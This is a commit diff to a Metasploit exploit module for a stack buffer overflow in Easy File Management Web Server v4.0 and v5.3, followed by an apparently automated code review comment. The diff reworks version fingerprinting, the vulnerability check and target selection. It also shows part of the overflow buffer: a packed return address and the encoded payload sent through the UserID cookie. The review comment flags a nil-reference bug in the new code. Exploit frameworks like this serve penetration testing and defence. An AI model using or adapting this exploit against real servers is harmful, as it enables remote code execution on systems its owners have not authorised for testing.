commit
278a53c3da
|
@ -12,16 +12,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Easy File Management Web Server v4.0/5.3 Stack Buffer Overflow',
|
||||
'Name' => 'Easy File Management Web Server Stack Buffer Overflow',
|
||||
'Description' => %q{
|
||||
Easy File Management Web Server contains a stack buffer overflow
|
||||
condition that is triggered as user-supplied input is not properly
|
||||
validated when handling the UserID cookie. This may allow a remote
|
||||
attacker to execute arbitrary code.
|
||||
|
||||
This version exploits:
|
||||
Easy File Management Web Server v4.0
|
||||
Easy File Management Web Server v5.3
|
||||
Easy File Management Web Server v4.0 and v5.3 contains a stack buffer
|
||||
overflow condition that is triggered as user-supplied input is not
|
||||
properly validated when handling the UserID cookie. This may allow a
|
||||
remote attacker to execute arbitrary code.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
|
@ -42,9 +38,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Arch' => ARCH_X86,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'ExitFunction' => 'process'
|
||||
'EXITFUNC' => 'process'
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00\x0a\x0d;",
|
||||
|
@ -79,34 +74,31 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# NOTE: Version 5.3 still reports "4.0" in the "Server" header
|
||||
#
|
||||
|
||||
res = send_request_raw 'uri' => '/whatsnew.txt'
|
||||
if res and res.body =~ /What's new in Easy File Management Web Server V(\d\.\d)/
|
||||
version = nil
|
||||
res = send_request_raw({'uri' => '/whatsnew.txt'})
|
||||
if res && res.body =~ /What's new in Easy File Management Web Server V(\d\.\d)/
|
||||
version = $1
|
||||
vprint_status "#{peer} - Found version: #{version}"
|
||||
return version
|
||||
elsif res.headers['server'] =~ /Easy File Management Web Server v(4\.0)/
|
||||
version = $1
|
||||
vprint_status "#{peer} - Based on Server header: #{version}"
|
||||
return version
|
||||
else
|
||||
fail_with(Failure::NoTarget, "#{peer} - Unable to automatically detect a target")
|
||||
end
|
||||
|
||||
version
|
||||
end
|
||||
|
||||
def check
|
||||
|
||||
code = Exploit::CheckCode::Safe
|
||||
version = get_version
|
||||
unless version
|
||||
vprint_status "#{peer} - No response to request"
|
||||
return Exploit::CheckCode::Unknown
|
||||
if version.nil?
|
||||
code = Exploit::CheckCode::Unknown
|
||||
elsif version == "5.3"
|
||||
code = Exploit::CheckCode::Appears
|
||||
elsif version == "4.0"
|
||||
code = Exploit::CheckCode::Appears
|
||||
end
|
||||
if version == "5.3"
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
if version == "4.0"
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
Exploit::CheckCode::Safe
|
||||
|
||||
code
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
@ -115,23 +107,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Get target version to determine how to reach call/jmp esp
|
||||
#
|
||||
|
||||
print_status("#{peer} - Fingerprinting version...")
|
||||
version = get_version
|
||||
|
||||
if target.name =~ /Automatic/
|
||||
version = get_version
|
||||
if version =~ /5\.3/
|
||||
if version.nil?
|
||||
fail_with(Failure::NoTarget, "#{peer} - Unable to automatically detect a target")
|
||||
elsif version =~ /5\.3/
|
||||
my_target = targets[1]
|
||||
else version =~ /4\.0/
|
||||
elsif version =~ /4\.0/
|
||||
my_target = targets[2]
|
||||
end
|
||||
print_good("#{peer} - Version #{version} found")
|
||||
else
|
||||
my_target = target
|
||||
end
|
||||
|
||||
#
|
||||
# Check if target appears to be vulnerable, if not exit
|
||||
#
|
||||
|
||||
unless check == Exploit::CheckCode::Appears || check == Exploit::CheckCode::Detected
|
||||
fail_with(Failure::NoTarget, "#{peer} - Target does not appear to be running fmws v4.0/5.3")
|
||||
unless version && my_target.name.include?(version)
|
||||
print_error("#{peer} - The selected target doesn't match the detected version, trying anyway...")
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
|
@ -150,7 +142,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sploit << [0x1002466D].pack("V") # Push eax > retn
|
||||
sploit << payload.encoded
|
||||
|
||||
print_status "#{peer} - Trying target #{target.name}..."
|
||||
print_status "#{peer} - Trying target #{my_target.name}..."
|
||||
|
||||
#
|
||||
# NOTE: Successful HTTP request is required to trigger
|
||||
|
|
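Review bot: In the Automatic branch of `exploit`, a fingerprint that is neither "5.3" nor "4.0" leaves `my_target` unassigned, and the later `print_status "#{peer} - Trying target #{my_target.name}..."` then raises NoMethodError on nil; since `get_version` captures any `\d\.\d` from whatsnew.txt, this is reachable against an unlisted version. The removed `else version =~ /4\.0/` at least fell through to `targets[2]`, so the new `elsif` chain needs a terminal branch before `print_good`, e.g. `else fail_with(Failure::NoTarget, "#{peer} - Unsupported version #{version}")`. Separately, in `get_version` the `elsif res.headers['server'] =~ ...` is still evaluated when `res` is nil (the `&&` only guards the first condition), so a host that does not answer raises instead of returning nil as `check` expects — guard it with `elsif res && res.headers['server'] =~ /Easy File Management Web Server v(4\.0)/`. The body of `exploit` continues past the end of the hunk.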